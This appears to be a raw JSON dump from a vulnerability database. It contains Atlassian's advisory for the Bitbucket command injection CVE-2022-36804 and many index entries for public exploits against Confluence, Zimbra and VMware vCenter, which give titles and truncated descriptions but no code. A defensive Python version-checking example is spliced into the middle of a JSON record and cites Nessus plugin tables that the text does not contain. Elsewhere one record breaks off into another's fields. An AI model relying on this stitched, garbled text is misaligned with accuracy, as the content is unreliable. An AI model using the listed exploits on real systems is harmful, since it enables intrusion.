An attacker with access to a public Bitbucket repository or with *read* permissions to a private one can execute arbitrary code by sending a malicious HTTP request.\r\n\r\nAll versions released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive can be exploited by this vulnerability.\r\n\r\nThe full list of affected versions can be found in the \"Affects Version/s:\" field of this report.\r\nh4. Affected versions:\r\n\r\nAll Bitbucket Server and Data Center versions from 7.0.0 to 8.3.0 inclusive.\r\nh4. Fixed versions:\r\n||*Supported Version*||*Bug Fix Release*||\r\n|[Bitbucket Server and Data Center 7.6|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Server+7.6+release+notes]|7.6.17 ([LTS|https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html]) or newer|\r\n|[Bitbucket Server and Data Center 7.17|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+7.17+release+notes]|7.17.10 ([LTS|https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html]) or newer|\r\n|[Bitbucket Server and Data Center 7.21|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+7.21+release+notes]|7.21.4 ([LTS|https://confluence.atlassian.com/enterprise/long-term-support-releases-948227420.html]) or newer|\r\n|[Bitbucket Server and Data Center 8.0|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.0+release+notes]|8.0.3 or newer|\r\n|[Bitbucket Server and Data Center 8.1|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.1+release+notes]|8.1.3 or newer|\r\n|[Bitbucket Server and Data Center 8.2|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.2+release+notes]|8.2.2 or newer|\r\n|[Bitbucket Server and Data Center 
8.3|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Data+Center+and+Server+8.3+release+notes]|8.3.1 or newer|\r\nh4. Bitbucket Mesh\r\n\r\nIf you have configured Bitbucket Mesh nodes, these will need to be updated with to the corresponding version of Mesh that includes the fix. To find the version of Mesh compatible with the Bitbucket Data Center version, please check the [+compatibility matrix+|https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Mesh+compatibility+matrix]. You can download the corresponding version from the [download centre|https://www.atlassian.com/software/bitbucket/download-mesh-archives].\r\n\r\n\u00a0\r\n\r\nFor additional details, please see full advisory here: [https://confluence.atlassian.com/pages/viewpage.action?spaceKey=SECURITY&title=August+2022%3A+Atlassian+Security+Advisories+Overview]\r\n\r\nThis vulnerability was discovered by\u00a0[@TheGrandPew|https://twitter.com/TheGrandPew]\u00a0and reported via our Bug Bounty program.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T22:40:01", "type": "atlassian", "title": "Critical severity command injection vulnerability - CVE-2022-36804", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
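Worked example, added here and not part of the page's records: the Nessus plugins above decide "vulnerable" purely by comparing a self-reported version against a `constraints` list, and the two Atlassian advisories express their fixes as per-branch version tables. The Python below reimplements that comparison for the four tables quoted on this page (the Zimbra Patch-level constraints from ZIMBRA_9_0_0_P24.NASL, the Confluence CVE-2022-26134 branches from CONFSERVER-79016, the Bitbucket CVE-2022-36804 range and fix table from BSERV-13438, and the Questions for Confluence fixed versions from CONFSERVER-79483). It is not Tenable's vcf.inc and not Atlassian code; the tables are transcribed from the page, and the comparison rules (an older base release inside a Zimbra branch is flagged regardless of patch level, a Bitbucket version is clean once its own major.minor branch has a fix it meets, any Questions for Confluence version outside the two listed fixed sets is treated as affected) are this example's reading of those tables, stated as assumptions. The sample versions in the `__main__` block are constructed, not scan output.

```python
# Added worked example: version-constraint evaluation in the style of the Nessus
# `constraints` lists and the Atlassian fixed-version tables quoted on this page.
# Not Tenable's vcf.inc and not Atlassian code; tables transcribed from the page,
# comparison rules are this example's own reading of them (see comments).
from typing import Optional


def parse_version(text: str) -> tuple:
    """'8.8.15' -> (8, 8, 15). Non-numeric input is rejected rather than silently
    compared as 0, so a garbled banner can never read as 'fixed'."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def vcmp(a: tuple, b: tuple) -> int:
    """Compare dotted versions, padding the shorter one with zeros (8.8 == 8.8.0)."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


# --- Zimbra (ZIMBRA_9_0_0_P24.NASL): base version plus a separate patch level ---
ZIMBRA_P24 = [
    {"min_version": "8.8", "max_version": "8.8.15", "Patch": 31},
    {"min_version": "9.0", "max_version": "9.0.0", "Patch": 24},
]


def zimbra_vulnerable(version: str, patch: Optional[int],
                      constraints=ZIMBRA_P24) -> Optional[bool]:
    """True/False when decidable; None when the base version equals the branch's
    last release but no patch level is known, because 8.8.15 Patch 30 and
    8.8.15 Patch 31 share the same base version string."""
    v = parse_version(version)
    for c in constraints:
        lo, hi = parse_version(c["min_version"]), parse_version(c["max_version"])
        if vcmp(v, lo) < 0 or vcmp(v, hi) > 0:
            continue
        if vcmp(v, hi) < 0:
            return True  # assumption: an older base release in the branch is flagged regardless of patch
        if patch is None:
            return None
        return patch < c["Patch"]
    return False


# --- Confluence CVE-2022-26134 (ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL) ---
CONFLUENCE_79016 = [  # (min_version, fixed_version) per branch, as in the plugin
    ("1.3.0", "7.4.17"), ("7.5.0", "7.13.7"), ("7.14.0", "7.14.3"),
    ("7.15.0", "7.15.2"), ("7.16.0", "7.16.4"), ("7.17.0", "7.17.4"),
    ("7.18.0", "7.18.1"),
]


def range_vulnerable(version: str, constraints=CONFLUENCE_79016,
                     sig_segments: int = 3) -> Optional[bool]:
    """min_version <= v < fixed_version. Same idea as the plugin's
    vcf::check_granularity(sig_segments:3): a version with fewer segments than
    the fix is inconclusive (None), since '7.18' sits on neither side of 7.18.1."""
    v = parse_version(version)
    if len(v) < sig_segments:
        return None
    for lo, fixed in constraints:
        if vcmp(v, parse_version(lo)) >= 0 and vcmp(v, parse_version(fixed)) < 0:
            return True
    return False


# --- Bitbucket CVE-2022-36804 (BSERV-13438): inclusive range plus per-branch fixes ---
BITBUCKET_13438 = {
    "affected": ("7.0.0", "8.3.0"),
    "fixed": ["7.6.17", "7.17.10", "7.21.4", "8.0.3", "8.1.3", "8.2.2", "8.3.1"],
}


def branch_vulnerable(version: str, table=BITBUCKET_13438) -> bool:
    """The advisory's '7.0.0 to 8.3.0 inclusive' cannot be applied literally:
    7.6.17 lies inside that range yet is a fix release. Assumption used here:
    a version is clean once its own major.minor branch has a fix it meets."""
    v = parse_version(version)
    lo, hi = (parse_version(x) for x in table["affected"])
    if vcmp(v, lo) < 0 or vcmp(v, hi) > 0:
        return False
    return not any(v[:2] == f[:2] and vcmp(v, f) >= 0
                   for f in map(parse_version, table["fixed"]))


# --- Questions for Confluence app (CONFSERVER-79483) ---
def questions_app_vulnerable(version: str) -> bool:
    """The advisory lists fixed app versions as 2.7.x >= 2.7.38 and >= 3.0.5.
    Assumption: anything outside those two sets still creates disabledsystemuser."""
    v = parse_version(version)
    fixed = (v[:2] == (2, 7) and vcmp(v, (2, 7, 38)) >= 0) or vcmp(v, (3, 0, 5)) >= 0
    return not fixed


if __name__ == "__main__":
    # Constructed sample versions, not real scan output.
    print("Zimbra 8.8.15 Patch 30:", zimbra_vulnerable("8.8.15", 30))        # True
    print("Zimbra 8.8.15 no patch:", zimbra_vulnerable("8.8.15", None))      # None
    print("Confluence 7.13.6:", range_vulnerable("7.13.6"))                  # True
    print("Bitbucket 7.6.17:", branch_vulnerable("7.6.17"))                  # False
    print("Questions 2.7.37:", questions_app_vulnerable("2.7.37"))           # True
```

Two practitioner caveats follow from the code. Every one of these checks inherits the limitation the plugin text states outright ("Nessus has not tested for this issue but has instead relied only on the application's self-reported version number"): a banner that omits the Zimbra patch level, or a version string with too few segments, must come back as inconclusive rather than as "not vulnerable", which is why two of the functions return `None` instead of guessing. And a plain inclusive range such as "7.0.0 to 8.3.0" is not the same predicate as the fix table that accompanies it; encode the table, not the summary sentence.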
"authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-12-06T14:52:37", "id": "BSERV-13438", "href": "https://jira.atlassian.com/browse/BSERV-13438", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-06-06T15:27:21", "description": "# CVE-2022-26138\n\n# 1.\u7b80\u4ecb\nConfluence Hardcoded Password POC\n\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-30T07:14:52", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Atlassian Questions For Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-04-27T05:22:39", "id": "120220D8-2281-57EE-BD84-1A33B8841E56", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:27:28", "description": "# Confluence-Question-CVE-2022-26138\nAtlassian Confluence Server...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:48:21", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Atlassian Questions For Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-09-21T21:50:55", "id": "E443E98A-3304-54B8-97FD-0FEF9DA283B3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:11", "description": "# CVE-2022-37042\n<img width=\"918\" alt=\"image\" src=\"https://user-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T10:43:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37042"], "modified": "2022-12-20T10:09:26", "id": "FCDAD5A1-9FBC-5C1B-9851-198B7C227459", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:48", "description": "# Zimbra-CVE-2022-30333\nZimbra unrar vulnerability. Now there ar...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-26T13:28:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2023-03-30T22:10:11", "id": "4E2B73A6-1A0A-5AE6-A7D0-44663A8164FC", "href": "", "cvss": {"score": 5.0, "vector": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-11-09T20:27:55", "id": "BD803D95-E2C1-554D-A0CD-6A594151E77B", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-22T16:04:09", "description": "Zimbra Unauthenticated Remote Code E...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-14T22:22:55", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-22T14:34:49", "id": "11DEDDB4-6148-5800-86D0-BF20A0453109", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-01T23:04:55", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-25T15:09:49", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-09-26T01:46:08", "id": "6BB3EE38-B4B6-590A-85A9-5EE59E4A9316", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:31", "description": "# CVE-2022-27925 (Zimbra RCE 2022)\n\nThis repo is part of the ***...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T10:33:55", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2023-05-19T03:10:08", "id": "549DF2E5-96E4-5204-9F2F-303AABC189EE", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:13", "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-2...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-17T22:24:32", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-07T03:31:22", "id": "A6071ED1-4DD2-5D98-9131-FEFBE84B4664", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-07-13T18:36:43", "description": "# VMware_vCenter_CVE-2021-21972\nVMware vCenter CVE-2021-21972 Re...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-27T10:27:04", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-14T04:48:32", "id": "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:18:01", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-02-25T18:22:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-08-27T21:28:19", "id": "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:50:02", "description": "## \u4f7f\u7528\u65b9\u6cd5&\u514d\u8d23\u58f0\u660e\r\n\r\nVMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (CVE-2021-21972)\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T10:16:20", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-11T16:29:19", "id": "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:57", "description": "# CVE-2021-21972\nCVE-2021-21972\n\nTested against VMware VCSA 6.7\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T13:04:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-07-14T14:37:02", "id": "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:51", "description": "# CVE-2021-21972\n\n### 
\u6f0f\u6d1e\u63cf\u8ff0\n\ncve-2021-21972\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n\u5177\u6709443\u7aef\u53e3\u8bbf\u95ee\u6743\u9650\u7684\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T13:19:41", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": 